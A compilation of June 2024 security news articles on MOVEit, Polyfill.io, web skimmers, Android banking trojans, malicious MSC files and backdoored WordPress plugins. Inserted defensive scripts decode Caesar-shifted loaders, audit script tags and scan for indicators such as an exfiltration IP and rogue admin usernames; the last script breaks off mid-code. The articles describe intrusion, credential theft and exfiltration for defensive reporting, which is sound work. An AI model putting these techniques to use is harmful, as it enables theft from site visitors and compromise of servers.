A newly disclosed critical security flaw impacting Progress Software MOVEit Transfer is already seeing exploitation attempts in the wild shortly after details of the bug were publicly disclosed.

The vulnerability, tracked as CVE-2024-5806 (CVSS score: 9.1), concerns an authentication bypass that impacts the following versions -

From 2023.0.0 before 2023.0.11
From 2023.1.0 before 2023.1.6, and
From 2024.0.0 before 2024.0.2

"Improper authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass," the company said in an advisory released Tuesday.

Progress has also addressed another critical SFTP-associated authentication bypass vulnerability (CVE-2024-5805, CVSS score: 9.1) affecting MOVEit Gateway version 2024.0.0.

Successful exploitation of the flaws could allow attackers to bypass SFTP authentication and gain access to MOVEit Transfer and Gateway systems.

watchTowr Labs has since published additional technical specifics about CVE-2024-5806, with security researchers Aliz Hammond and Sina Kheirkhah noting that it could be weaponized to impersonate any user on the server.

The company further described the flaw as comprising two separate vulnerabilities, one in Progress MOVEit and the other in the IPWorks SSH library.

"While the more devastating vulnerability, the ability to impersonate arbitrary users, is unique to MOVEit, the less impactful (but still very real) forced authentication vulnerability is likely to affect all applications that use the IPWorks SSH server," the researchers said.

Progress Software said the shortcoming in the third-party component "elevates the risk of the original issue" if left unpatched, urging customers to follow the below two steps -

Block public inbound RDP access to MOVEit Transfer server(s)
Limit outbound access to only known trusted endpoints from MOVEit Transfer server(s)

According to Rapid7, there are three prerequisites for leveraging CVE-2024-5806: the attacker must know an existing username, the target account must be able to authenticate remotely, and the SFTP service must be publicly accessible over the internet.

As of June 25, data gathered by Censys shows that there are around 2,700 MOVEit Transfer instances online, most of them located in the U.S., the U.K., Germany, the Netherlands, Canada, Switzerland, Australia, France, Ireland, and Denmark.

With another critical issue in MOVEit Transfer widely abused in a spate of Cl0p ransomware attacks last year (CVE-2023-34362, CVSS score: 9.8), it's essential that users move quickly to update to the latest versions.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that its Chemical Security Assessment Tool (CSAT) was targeted earlier this January by an unknown threat actor who took advantage of security flaws in the Ivanti Connect Secure (ICS) appliance (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893).

"This intrusion may have resulted in the potential unauthorized access of Top-Screen surveys, Security Vulnerability Assessments, Site Security Plans, Personnel Surety Program (PSP) submissions, and CSAT user accounts," the agency said, adding it found no evidence of data exfiltration.

Update
Progress Software, in a statement shared with The Hacker News, said "we have not received any reports that these vulnerabilities have been exploited and we are not aware of any direct operational impact to customers."

(The story has been updated after publication to emphasize that the attacks are exploitation attempts at this stage.)


Chinese and N. Korean Hackers Target Global Infrastructure with Ransomware
27.6.24 
APT  The Hacker News
Threat actors with suspected ties to China and North Korea have been linked to ransomware and data encryption attacks targeting government and critical infrastructure sectors across the world between 2021 and 2023.

While one cluster of activity has been associated with the ChamelGang (aka CamoFei), the second cluster overlaps with activity previously attributed to Chinese and North Korean state-sponsored groups, cybersecurity firms SentinelOne and Recorded Future said in a joint report shared with The Hacker News.

This includes ChamelGang's attacks aimed at the All India Institute of Medical Sciences (AIIMS) and the Presidency of Brazil in 2022 using CatB ransomware, as well as those targeting a government entity in East Asia and an aviation organization in the Indian subcontinent in 2023.
"Threat actors in the cyber espionage ecosystem are engaging in an increasingly disturbing trend of using ransomware as a final stage in their operations for the purposes of financial gain, disruption, distraction, misattribution, or removal of evidence," security researchers Aleksandar Milenkoski and Julian-Ferdinand Vögele said.

Ransomware attacks in this context not only serve as an outlet for sabotage but also allow threat actors to cover up their tracks by destroying artifacts that could otherwise alert defenders to their presence.

ChamelGang, first documented by Positive Technologies in 2021, is assessed to be a China-nexus group that operates with motivations as varied as intelligence gathering, data theft, financial gain, denial-of-service (DoS) attacks, and information operations, according to Taiwanese cybersecurity firm TeamT5.

It's known to possess a wide range of tools in its arsenal, including BeaconLoader, Cobalt Strike, backdoors like AukDoor and DoorMe, and a ransomware strain known as CatB, which has been identified as used in attacks targeting Brazil and India based on commonalities in the ransom note, the format of the contact email address, the cryptocurrency wallet address, and the filename extension of encrypted files.

Attacks observed in 2023 have also leveraged an updated version of BeaconLoader to deliver Cobalt Strike for reconnaissance and post-exploitation activities such as dropping additional tooling and exfiltrating NTDS.dit database file.

Furthermore, it's worth pointing out that custom malware put to use by ChamelGang such as DoorMe and MGDrive (whose macOS variant is called Gimmick) have also been linked to other Chinese threat groups like REF2924 and Storm Cloud, once again alluding to the possibility of a "digital quartermaster supplying distinct operational groups with malware."

The other set of intrusions involves the use of Jetico BestCrypt and Microsoft BitLocker in cyber attacks affecting various industry verticals in North America, South America, and Europe. As many as 37 organizations, predominantly in the U.S. manufacturing sector, are estimated to have been targeted.

The tactics observed, per the two companies, are consistent with those attributed to a Chinese hacking crew dubbed APT41 and a North Korean actor known as Andariel, owing to the presence of tools like the China Chopper web shell and a backdoor known as DTrack.
"The activities we observed overlap with past intrusions involving artifacts associated with suspected Chinese and North Korean APT clusters," Milenkoski told The Hacker News, stating visibility limitations have likely prevented detecting the malicious artifacts themselves.

"Our investigations and our review of previous research did not reveal evidence of tooling or other intrusion artifacts associated with suspected Chinese or North Korean APT groups being present concurrently in the same targeted environments."

SentinelOne further said it cannot exclude the possibility that these activities are part of a broader cybercriminal scheme, particularly given that nation-state actors have also taken part in financially motivated attacks from time to time.

"Cyber espionage operations disguised as ransomware activities provide an opportunity for adversarial countries to claim plausible deniability by attributing the actions to independent cybercriminal actors rather than state-sponsored entities," the researchers said.

"The use of ransomware by cyber espionage threat groups blurs the lines between cybercrime and cyber espionage, providing adversaries with advantages from both strategic and operational perspectives."

(The story was updated after publication to include a response from SentinelOne.)


Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping
27.6.24 
OS  The Hacker News
Apple has released a firmware update for AirPods to fix a vulnerability that could allow a malicious actor to gain unauthorized access to the headphones.

Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.

"When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory.

In other words, an adversary in physical proximity could exploit the vulnerability to eavesdrop on private conversations. Apple said the issue has been addressed with improved state management.

Jonas Dreßler has been credited with discovering and reporting the flaw. It has been patched as part of AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8.

The development comes two weeks after the iPhone maker rolled out updates for visionOS (version 1.2) to close out 21 shortcomings, including seven flaws in the WebKit browser engine.
One of the issues pertains to a logic flaw (CVE-2024-27812) that could result in a denial-of-service (DoS) when processing web content. The problem has been fixed with improved file handling, it said.

Security researcher Ryan Pickren, who reported the vulnerability, described it as the "world's first spatial computing hack" that could be weaponized to "bypass all warnings and forcefully fill your room with an arbitrary number of animated 3D objects" sans user interaction.

The vulnerability takes advantage of Apple's failure to apply the permissions model when using the ARKit Quick Look feature to spawn 3D objects in a victim's room. Making matters worse, these animated objects continue to persist even after exiting Safari as they are handled by a separate application.

"Furthermore, it does not even require this anchor tag to have been 'clicked' by the human," Pickren said. "So programmatic JavaScript clicking (i.e., document.querySelector('a').click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever."


New Credit Card Skimmer Targets WordPress, Magento, and OpenCart Sites
27.6.24 
Crime  The Hacker News
Multiple content management system (CMS) platforms like WordPress, Magento, and OpenCart have been targeted by a new credit card web skimmer called Caesar Cipher Skimmer.

A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information.

According to Sucuri, the latest campaign entails making malicious modifications to the checkout PHP file associated with the WooCommerce plugin for WordPress ("form-checkout.php") to steal credit card details.

"For the past few months, the injections have been changed to look less suspicious than a long obfuscated script," security researcher Ben Martin said, noting the malware's attempt to masquerade as Google Analytics and Google Tag Manager.
Specifically, it utilizes the same substitution mechanism employed in Caesar cipher to encode the malicious piece of code into a garbled string and conceal the external domain that's used to host the payload.
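A triage helper for the encoding scheme described above, added here as an example and not part of Sucuri's analysis: it brute-forces every letter shift of a garbled string and reports the decodings that contain a URL, which is how the concealed external domain can be recovered during incident response. The encoded sample is constructed in the block itself from a placeholder URL; no real skimmer payload is used.

```python
import re
import string

# Constructed sample: a placeholder URL shifted by 7 over ASCII letters only
# (digits and punctuation untouched), mimicking the substitution described in
# the article. This is not a real skimmer string.
_PLAIN = 'https://cdn.example-placeholder.invalid/analytics.js'


def caesar_shift(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions; leave every other character as-is."""
    lower, upper = string.ascii_lowercase, string.ascii_uppercase
    out = []
    for ch in text:
        if ch in lower:
            out.append(lower[(lower.index(ch) + shift) % 26])
        elif ch in upper:
            out.append(upper[(upper.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return ''.join(out)


SAMPLE_ENCODED = caesar_shift(_PLAIN, 7)

# Signs that a candidate decoding is the real loader: a URL and common DOM/script words.
_URL_RE = re.compile(r'https?://[a-z0-9.-]+\.[a-z]{2,}', re.I)
_KEYWORDS = ('document', 'createelement', 'script', 'websocket', 'src')


def decode_candidates(encoded: str):
    """Try all 26 shifts and return (shift, decoded, score), best score first."""
    results = []
    for shift in range(26):
        decoded = caesar_shift(encoded, -shift)
        score = 5 if _URL_RE.search(decoded) else 0
        score += sum(1 for k in _KEYWORDS if k in decoded.lower())
        results.append((shift, decoded, score))
    results.sort(key=lambda r: r[2], reverse=True)
    return results


def extract_hidden_domains(encoded: str):
    """Return the hostnames found in every decoding that contains a URL."""
    hosts = set()
    for _shift, decoded, score in decode_candidates(encoded):
        if score >= 5:
            for m in _URL_RE.finditer(decoded):
                hosts.add(m.group(0).split('//', 1)[1].lower())
    return hosts


if __name__ == '__main__':
    best_shift, best_text, _ = decode_candidates(SAMPLE_ENCODED)[0]
    print(f'shift {best_shift}: {best_text}')
    print('hidden domains:', extract_hidden_domains(SAMPLE_ENCODED))
```

The recovered hostnames are what to block at the proxy and search for across the rest of the site's PHP and database content.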

It's presumed that all the websites have been previously compromised through other means to stage a PHP script that goes by the names "style.css" and "css.php" in an apparent effort to mimic an HTML style sheet and evade detection.

These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.

"The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site," Martin pointed out. "Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them."

Some versions of the script have programmer-readable explanations (aka comments) written in Russian, suggesting that the threat actors behind the operation are Russian-speaking.

The form-checkout.php file in WooCommerce is not the only method used to deploy the skimmer, as the attackers have also been spotted misusing the legitimate WPCode plugin to inject it into the website database.
On websites that use Magento, the JavaScript injections are performed on database tables such as core_config_data. It's currently not known how this is accomplished on OpenCart sites.

Due to its prevalent use as a foundation for websites, WordPress and the larger plugin ecosystem have become a lucrative target for malicious actors, allowing them easy access to a vast attack surface.

It's imperative that site owners keep their CMS software and plugins up-to-date, enforce password hygiene, and periodically audit them for the presence of suspicious administrator accounts.


New Medusa Android Trojan Targets Banking Users Across 7 Countries
27.6.24 
Virus  The Hacker News

Cybersecurity researchers have discovered an updated version of an Android banking trojan called Medusa that has been used to target users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S.

The new fraud campaigns, observed in May 2024 and active since July 2023, manifested through five different botnets operated by various affiliates, cybersecurity firm Cleafy said in an analysis published last week.

The new Medusa samples feature a "lightweight permission set and new features, such as the ability to display a full-screen overlay and remotely uninstall applications," security researchers Simone Mattia and Federico Valentini said.

Medusa, also known as TangleBot, is a sophisticated Android malware first discovered in July 2020 targeting financial entities in Turkey. It comes with capabilities to read SMS messages, log keystrokes, capture screenshots, record calls, share the device screen in real-time, and perform unauthorized fund transfers using overlay attacks to steal banking credentials.
In February 2022, ThreatFabric uncovered Medusa campaigns leveraging similar delivery mechanisms as that of FluBot (aka Cabassous) by masquerading the malware as seemingly harmless package delivery and utility apps. It's suspected that the threat actors behind the Trojan are from Turkey.

Cleafy's latest analysis reveals not only improvements to the malware, but also the use of dropper apps to disseminate Medusa under the guise of fake updates. Furthermore, legitimate services like Telegram and X are used as dead drop resolvers to retrieve the command-and-control (C2) server used for data exfiltration.

A notable change is the reduction in the number of permissions sought in an apparent effort to lower the chances of detection. That said, it still requires Android's accessibility services API, which allows it to stealthily enable other permissions as required and avoid raising user suspicion.


Another modification is the ability to set a black screen overlay on the victim's device to give the impression that the device is locked or powered off and use it as a cover to carry out malicious activities.

Medusa botnet clusters typically rely on tried-and-tested approaches such as phishing to spread the malware. However, newer waves have been observed propagating it via dropper apps downloaded from untrusted sources, underscoring continued efforts on the part of threat actors to evolve their tactics.

"Minimizing the required permissions evades detection and appears more benign, enhancing its ability to operate undetected for extended periods," the researchers said. "Geographically, the malware is expanding into new regions, such as Italy and France, indicating a deliberate effort to diversify its victim pool and broaden its attack surface."
The development comes as Symantec revealed that fictitious Chrome browser updates for Android are being used as a lure to drop the Cerberus banking trojan. Similar campaigns distributing bogus Telegram apps via phony websites ("telegroms[.]icu") have also been observed distributing another Android malware dubbed SpyMax.

Once installed, the app prompts the user to enable the accessibility services, allowing it to gather keystrokes, precise locations, and even the speed at which the device is moving. The collected information is then compressed and exported to an encoded C2 server.

"SpyMax is a remote administration tool (RAT) that has the capability to gather personal/private information from the infected device without consent from the user and sends the same to a remote threat actor," K7 Security Labs said. "This enables the threat actors to control victims' devices that impacts the confidentiality and integrity of the victim's privacy and data."


Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack
27.6.24 
Hacking  The Hacker News
Google has taken steps to block ads for e-commerce sites that use the Polyfill.io service after a Chinese company acquired the domain and modified the JavaScript library ("polyfill.js") to redirect users to malicious and scam sites.

More than 110,000 sites that embed the library are impacted by the supply chain attack, Sansec said in a Tuesday report.

"Protecting our users is our top priority. We detected a security issue recently that may affect websites using certain third-party libraries," the company said in a statement shared with The Hacker News. "To help potentially impacted advertisers secure their websites, we have been proactively sharing information on how to quickly mitigate the issue."

Polyfill is a popular library that incorporates support for modern functions in web browsers. Earlier this February, concerns were raised following its purchase by China-based content delivery network (CDN) company Funnull.

The original creator of the project, Andrew Betts, urged website owners to immediately remove it, adding "no website today requires any of the polyfills in the polyfill[.]io library" and that "most features added to the web platform are quickly adopted by all major browsers, with some exceptions that generally can't be polyfilled anyway, like Web Serial and Web Bluetooth."
The development also prompted web infrastructure providers Cloudflare and Fastly to offer alternative endpoints to help users move away from polyfill[.]io.

"The concerns are that any website embedding a link to the original polyfill[.]io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack," Cloudflare researchers Sven Sauleau and Michael Tremante noted at the time.

"Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
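A site-side check for the exposure Cloudflare describes, added as an example that is not part of the original report: it parses a page's script tags, flags any that still load from polyfill.io, and, going one step further than the article, also flags cross-origin scripts that carry no Subresource Integrity attribute, since those would be equally exposed to a CDN takeover. The HTML below is constructed; the only real hostnames in it are the polyfill.io ones named in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the article reports as taken over (written de-fanged there).
RISKY_HOSTS = {'polyfill.io', 'cdn.polyfill.io'}

# Constructed sample page for a fictional shop at shop.example.invalid.
SAMPLE_HTML = """
<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="//thirdparty.example.invalid/widget.js"></script>
<script src="https://static.shop.example.invalid/vendor.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="/js/app.js"></script>
</head><body></body></html>
"""


class _ScriptTagCollector(HTMLParser):
    """Collects the attribute dict of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':  # HTMLParser lower-cases tag and attribute names
            self.scripts.append(dict(attrs))


def _host_of(src: str) -> str:
    """Hostname of a script URL; '' for same-origin relative paths."""
    if src.startswith('//'):
        src = 'https:' + src
    return (urlparse(src).hostname or '').lower()


def audit_scripts(html: str, site_host: str):
    """Return (src, reason) for external scripts that need attention."""
    parser = _ScriptTagCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get('src')
        if not src:
            continue  # inline script, not a third-party dependency
        host = _host_of(src)
        if host in RISKY_HOSTS or host.endswith('.polyfill.io'):
            findings.append((src, 'loads from polyfill.io: remove the tag or self-host the file'))
        elif host and host != site_host.lower() and 'integrity' not in attrs:
            findings.append((src, 'cross-origin script without Subresource Integrity'))
    return findings


if __name__ == '__main__':
    for src, reason in audit_scripts(SAMPLE_HTML, 'shop.example.invalid'):
        print(f'{src}: {reason}')
```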

The Dutch e-commerce security firm said the domain "cdn.polyfill[.]io" has since been caught injecting malware that redirects users to sports betting and pornographic sites.

"The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours," it said. "It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats."

San Francisco-based c/side has also issued an alert of its own, noting that the domain maintainers added a Cloudflare Security Protection header to their site between March 7 and 8, 2024.
The findings follow an advisory about a critical security flaw impacting Adobe Commerce and Magento websites (CVE-2024-34102, CVSS score: 9.8) that continues to remain largely unpatched despite fixes being available since June 11, 2024.

"In itself, it allows anyone to read private files (such as those with passwords)," said Sansec, which has codenamed the exploit chain CosmicSting. "However, combined with the recent iconv bug in Linux, it turns into the security nightmare of remote code execution."

It has since emerged that third parties can gain API admin access without requiring a Linux version vulnerable to the iconv issue (CVE-2024-2961), making it an even more severe issue.

(The story was updated after publication to include a response from Google.)


New Attack Technique Exploits Microsoft Management Console Files
25.6.24 
Hacking  The Hacker News

Threat actors are exploiting a novel attack technique in the wild that leverages specially crafted management saved console (MSC) files to gain full code execution using Microsoft Management Console (MMC) and evade security defenses.

Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware scanning platform on June 6, 2024.

"When a maliciously crafted console file is imported, a vulnerability in one of the MMC libraries can lead to running adversary code, including malware," the company said in a statement shared with The Hacker News.


"Attackers can combine this technique with DotNetToJScript to gain arbitrary code execution, which can lead to unauthorized access, system takeover and more."

The use of uncommon file types as a malware distribution vector is seen as an alternative attempt by adversaries to get around security guardrails erected by Microsoft in recent years, including disabling macros by default in Office files downloaded from the internet.

Last month, South Korean cybersecurity firm Genians detailed the use of a malicious MSC file by the North Korea-linked Kimsuky hacking group to deliver malware.

GrimResource, on the other hand, exploits a cross-site scripting (XSS) flaw present in the apds.dll library to execute arbitrary JavaScript code in the context of MMC. The XSS flaw was originally reported to Microsoft and Adobe in late 2018, although it remains unpatched to date.

This is accomplished by adding a reference to the vulnerable APDS resource in the StringTable section of a malicious MSC file, which, when opened using MMC, triggers the execution of JavaScript code.
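A static triage check for the indicator just described, added as an example and not Elastic's own tooling: MSC files are XML, so the script walks every StringTable and reports String entries that mention apds.dll, which a legitimate console file has no reason to contain. The sample document is constructed; its element names follow the MMC console layout as assumed here, and the check deliberately ignores exact nesting so it still works if that assumption is slightly off.

```python
import xml.etree.ElementTree as ET

# Constructed minimal console file. Element names are an assumption about the
# MMC XML layout; the placeholder string only names the library, nothing more.
SAMPLE_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
        <String ID="2" Refs="1">PLACEHOLDER reference to apds.dll</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# Substrings that should never appear in a console file's string table.
SUSPICIOUS_MARKERS = ('apds.dll',)


def find_suspicious_strings(msc_xml: str):
    """Return (string_id, text) for StringTable entries containing a marker."""
    root = ET.fromstring(msc_xml)
    hits = []
    for table in root.iter():
        if table.tag.lower() != 'stringtable':
            continue
        for entry in table.iter():
            if entry.tag.lower() != 'string':
                continue
            text = entry.text or ''
            if any(marker in text.lower() for marker in SUSPICIOUS_MARKERS):
                hits.append((entry.get('ID'), text))
    return hits


def is_suspicious_msc(msc_xml: str) -> bool:
    """True when at least one string-table entry references a marker."""
    return bool(find_suspicious_strings(msc_xml))


if __name__ == '__main__':
    for string_id, text in find_suspicious_strings(SAMPLE_MSC):
        print(f'String ID={string_id}: {text!r}')
```

Run it over .msc attachments quarantined by mail or endpoint tooling; a hit is grounds to block the file and hunt for mmc.exe spawning unexpected child processes on the host that opened it.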


The technique not only bypasses ActiveX warnings, it can be combined with DotNetToJScript to gain arbitrary code execution. The analyzed sample uses this approach to launch a .NET loader component dubbed PASTALOADER that ultimately paves the way for Cobalt Strike.

"After Microsoft disabled Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity," security researchers Joe Desimone and Samir Bousseaden said.

"However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files."


New Cyberthreat 'Boolka' Deploying BMANAGER Trojan via SQLi Attacks
25.6.24 
Virus  The Hacker News

A previously undocumented threat actor dubbed Boolka has been observed compromising websites with malicious scripts to deliver a modular trojan codenamed BMANAGER.

"The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022," Group-IB researchers Rustam Mirkasymov and Martijn van den Berk said in a report published last week.

"Over the last three years, the threat actors have been infecting vulnerable websites with malicious JavaScript scripts capable of intercepting any data entered on an infected website."


Boolka gets its name from the JavaScript code inserted into the website that beacons out to a command-and-control server named "boolka[.]tk" every time an unsuspecting visitor lands on the infected site.

The JavaScript is also designed to collect and exfiltrate user inputs and interactions in a Base64-encoded format, indicating the use of the malware to grab sensitive details like credentials and other personal information.

Furthermore, it redirects users to a bogus loading page that prompts victims to download and install a browser extension when, in reality, it drops a downloader for the BMANAGER trojan, which, in turn, attempts to fetch the malware from a hard-coded URL. The malware delivery framework is based on the BeEF framework.


The trojan, for its part, serves as a conduit to deploy four additional modules, including BMBACKUP (harvest files from particular paths), BMHOOK (record which applications are running and have keyboard focus), BMLOG (log keystrokes), and BMREADER (export stolen data). It also sets up persistence on the host using scheduled tasks.

"Most samples make use of a local SQL database," the researchers noted. "The path and name of this database is hard-coded in the samples to be located at: C:\Users\{user}\AppData\Local\Temp\coollog.db, with user being the username of the logged in user."


Boolka is the third actor after GambleForce and ResumeLooters to leverage SQL injection attacks to steal sensitive data in recent months.

"Starting from opportunistic SQL injection attacks in 2022 to the development of his own malware delivery platform and trojans like BMANAGER, Boolka's operations demonstrate the group's tactics have grown more sophisticated over time," the researchers concluded.

"The injection of malicious JavaScript snippets into vulnerable websites for data exfiltration, and then the use of the BeEF framework for malware delivery, reflects the step-by-step development of the attacker's competencies."


Wikileaks' Julian Assange Released from U.K. Prison, Heads to Australia
25.6.24 
BigBrothers  The Hacker News
WikiLeaks founder Julian Assange has been freed in the U.K. and has departed the country after serving more than five years in a maximum security prison at Belmarsh for what was described by the U.S. government as the "largest compromises of classified information" in its history.

Capping off a 14-year legal saga, Assange, 52, pleaded guilty to one criminal count of conspiring to obtain and disclose classified U.S. national defense documents. He is due to be sentenced to 62 months of time already served on the Pacific island of Saipan later this week.

According to the Associated Press, the hearing is taking place there because of Assange's "opposition to traveling to the continental U.S. and the court's proximity to Australia."


"This is the result of a global campaign that spanned grass-roots organizers, press freedom campaigners, legislators and leaders from across the political spectrum, all the way to the United Nations," WikiLeaks said in a statement.

"This created the space for a long period of negotiations with the U.S. Department of Justice, leading to a deal that has not yet been formally finalized."

Assange, who was granted bail by the High Court in London on Monday, has since boarded a flight to Australia. He also faced separate charges of rape and sexual assault in Sweden, claims he has denied.

The U.S. Department of Justice (DoJ) in 2019 said Assange's actions "risked serious harm to United States national security to the benefit of our adversaries and put the unredacted named human sources at a grave and imminent risk of serious physical harm and/or arbitrary detention."

It's believed that the DoJ accepted the plea agreement with no additional prison time because Assange had already served longer than most people charged with a similar offense.

Founded in 2006, WikiLeaks is estimated to have published more than 10 million documents related to war, spying, and corruption, including military field logs from the wars in Afghanistan and Iraq, as well as diplomatic cables from the U.S. (dubbed Cablegate) and information about detainees at the Guantanamo Bay detention camp.


Notably, it also released a tranche of cyber warfare and surveillance tools allegedly created by the U.S. Central Intelligence Agency (CIA), a collection cumulatively known as Vault 7 and Vault 8, and documents detailing the National Security Agency's spying on France, Germany, Brazil, and Japan.

Joshua Schulte, a former CIA engineer who was accused of passing on the confidential trove of cyber weapons, has since been sentenced to 40 years in prison.

Another of Assange's collaborators, Chelsea Elizabeth Manning (born Bradley Edward Manning), was sentenced to 35 years in prison for disclosing to WikiLeaks hundreds of thousands of documents that came to be known as the Iraq War Logs and Afghan War Diary before then-president Barack Obama commuted her sentence in January 2017.


4 FIN9-linked Vietnamese Hackers Indicted in $71M U.S. Cybercrime Spree
25.6.24 
APT  The Hacker News
Four Vietnamese nationals with ties to the FIN9 cybercrime group have been indicted in the U.S. for their involvement in a series of computer intrusions that caused over $71 million in losses to companies.

The defendants, Ta Van Tai (aka Quynh Hoa and Bich Thuy), Nguyen Viet Quoc (aka Tien Nguyen), Nguyen Trang Xuyen, and Nguyen Van Truong (aka Chung Nguyen), have been accused of conducting phishing campaigns and supply chain compromises to orchestrate cyber attacks and steal millions of dollars.

"From at least May 2018 through October 2021, the defendants hacked the computer networks of victim companies throughout the United States and used their access to steal or attempt to steal non-public information, employee benefits, and funds," the U.S. Department of Justice said in an unsealed indictment last week.

According to court documents, the individuals – after successfully gaining initial access to target networks – stole gift card data, personally identifiable information, and credit card details associated with employees and customers.


They then used the stolen information to further their criminal activities and evade detection, including opening online accounts at cryptocurrency exchanges and setting up hosting servers.

"Tai, Xuyen, and Truong sold stolen gift cards to third parties, including through an account registered with a fake name on a peer-to-peer cryptocurrency marketplace, in order to conceal and disguise the source of the stolen money," the DoJ said.

All four defendants have been charged with one count of conspiracy to commit fraud, extortion, and related activity in connection with computers; one count of conspiracy to commit wire fraud; and two counts of intentional damage to a protected computer. If convicted on all counts, they face up to 45 years in prison.

Additionally, Tai, Xuyen, and Truong have been charged with one count of conspiracy to commit money laundering, which carries a jail term of up to 20 years. Tai and Quoc have also been saddled with one count of aggravated identity theft and one count of conspiracy to commit identity fraud, charges that can have a maximum penalty of up to 17 years in prison.

The development comes days after the DoJ said that two U.S. members of the ViLE hacking group, Sagar Steven Singh (aka Weep) and Nicholas Ceraolo (aka Convict, Anon, and Ominous), pleaded guilty for their involvement in the compromise of a federal law enforcement database by using stolen credentials and engaging in an extortion scheme.

"The defendants called themselves 'ViLe,' and their actions were exactly that," U.S. Attorney Breon Peace said. "They hacked into a law enforcement database and had access to sensitive personal information, then threatened to harm a victim's family and publicly release that information unless the defendants were ultimately paid money."

The two men, who were originally charged in March 2023, pled guilty to conspiring to commit computer intrusion and aggravated identity theft. They face a minimum sentence of two years in prison, and a maximum of seven years.

It also follows a new wave of sanctions imposed by the European Council against six persons for conducting cyber attacks against critical infrastructure and government systems in the European Union and Ukraine.


This includes Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, two hackers associated with the COLDRIVER (aka BlueCharlie, Calisto, Gossamer Bear, and Star Blizzard) hacking crew who were previously sanctioned by the U.K. and U.S. governments for carrying out spear-phishing campaigns.

The remaining four encompass Sklianko Oleksandr Mykolaiovych and Chernykh Mykola Serhiiovych of the Gamaredon (aka Armageddon) group and Mikhail Tsarev and Maksim Galochkin of the Wizard Spider gang, the latter two of which are assessed to be key players in the deployment of Conti and TrickBot malware.

"The E.U. remains committed to a global, open, and secure cyberspace and reiterates the need to strengthen international cooperation to promote the rules-based order in this area," the Council said.


Multiple WordPress Plugins Compromised: Hackers Create Rogue Admin Accounts
25.6.24 
Virus  The Hacker News
Multiple WordPress plugins have been backdoored to inject malicious code that makes it possible to create rogue administrator accounts with the aim of performing arbitrary actions.

"The injected malware attempts to create a new administrative user account and then sends those details back to the attacker-controlled server," Wordfence security researcher Chloe Chamberland said in a Monday alert.

"In addition, it appears the threat actor also injected malicious JavaScript into the footer of websites that appears to add SEO spam throughout the website."


The admin accounts have the usernames "Options" and "PluginAuth," with the account information exfiltrated to the IP address 94.156.79[.]8.

It's currently not known how the unknown attackers behind the campaign managed to compromise the plugins, but the earliest signs of the software supply chain attack date back to June 21, 2024.

The plugins in question are no longer available for download from the WordPress plugin directory pending ongoing review -

Social Warfare 4.4.6.4 – 4.4.7.1 (Patched version: 4.4.7.3) - 30,000+ installs
Blaze Widget 2.2.5 – 2.5.2 (Patched version: N/A) - 10+ installs
Wrapper Link Element 1.0.2 – 1.0.3 (Patched version: N/A) - 1,000+ installs
Contact Form 7 Multi-Step Addon 1.0.4 – 1.0.5 (Patched version: N/A) - 700+ installs
Simply Show Hooks 1.2.1 (Patched version: N/A) - 4,000+ installs
Users of the aforementioned plugins are advised to inspect their sites for suspicious administrator accounts and delete them, in addition to removing any malicious code.
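A practical way to act on that advice is to sweep both the plugin sources and the user table for the indicators Wordfence published. The following Go program is an added example, not code from Wordfence or any of the affected plugins: it scans PHP source for the exfiltration IP and the two rogue usernames (taken from the advisory), plus two heuristics that are assumptions of mine (an admin-role user creation and a script tag hooked into wp_footer), and it flags administrator accounts that use the rogue names or were registered on or after June 21, 2024. The PHP snippet and the user records are constructed sample input.

```go
package main

import (
	"fmt"
	"regexp"
)

// Finding is one indicator hit inside a scanned plugin source file.
type Finding struct {
	File      string
	Indicator string
}

// The first two indicators come from the Wordfence advisory; the last two are
// my own heuristics for the behaviour it describes, not published signatures.
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"exfil-ip 94.156.79.8", regexp.MustCompile(`94\.156\.79\.8`)},
	{"rogue-username Options/PluginAuth", regexp.MustCompile(`['"](?:Options|PluginAuth)['"]`)},
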